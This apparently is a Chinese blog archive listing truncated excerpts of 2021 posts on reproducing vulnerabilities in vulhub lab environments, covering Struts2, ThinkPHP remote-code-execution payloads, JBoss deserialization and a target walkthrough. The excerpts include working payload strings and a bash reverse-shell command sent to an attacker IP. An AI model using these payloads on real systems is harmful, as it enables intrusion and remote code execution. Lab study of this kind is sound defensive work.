03 2021 档案

摘要:1,环境搭建 docker + vulhub 判断struts 一般攻击者在攻击之前会判断网站是Struts2编写,主要看有没有链接是.action或者.do结尾的,这是因为配置文件struts.xml指定了action的后缀 漏洞原因 用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使 阅读全文
posted @ 2021-03-28 09:57 ze_z 阅读(121) 评论(0) 推荐(0)
摘要:文件处理 f=open(“name.txt”,'r') //读取文件name.txt for line in f.readlines(): //line 为 name.txt 中每以行 han=line.strip('\n') //去掉换行 sys模块 import sys //导入sys模块 // 阅读全文
posted @ 2021-03-17 21:53 ze_z 阅读(41) 评论(0) 推荐(0)
摘要:1 环境 kali 2021(nat 模式) 靶机(nat模式) 2信息收集 netdiscover 发现靶机ip 靶机ip:192.168.159.129 查看开发端口 nmap -T4 -A -p- 192.168.159.129 使用kali默认字典扫描下目录 看一下80端口 添加XFF 在l 阅读全文
posted @ 2021-03-16 16:07 ze_z 阅读(117) 评论(0) 推荐(0)
摘要:post提交数据 POST /index.php?s=captcha HTTP/1.1 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd &server[REQUEST_METHOD] 变量会被执行 p 阅读全文
posted @ 2021-03-15 14:02 ze_z 阅读(1244) 评论(0) 推荐(0)
摘要:环境搭建 kali中下载vulhub 安装docker 与docker-compose 漏洞影响范围 thinkphp2.x 漏洞复现 payload1 /index.php?s=/index/index/xxx/${@phpinfo()} //出现phpinfo明杆路径 payload2 /ind 阅读全文
posted @ 2021-03-14 20:22 ze_z 阅读(329) 评论(0) 推荐(0)
摘要:影响范围 JBoss AS 4.x及之前版本 复现 编译生成序列化数据 序列化恶意数据 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.16 阅读全文
posted @ 2021-03-14 12:24 ze_z 阅读(374) 评论(0) 推荐(0)
摘要:环境 vulhub +docker 搭建 访问 /invoker/readonly 返回500,说明页面存在,此页面存在反序列化漏洞 github 上 有可用的exp https://github.com/yunxu1/jboss-_CVE-2017-12149 验证 修复 不需要 http-inv 阅读全文
posted @ 2021-03-13 21:43 ze_z
摘要:# hello word 阅读全文
posted @ 2021-03-12 16:37 ze_z 阅读(28) 评论(0) 推荐(0)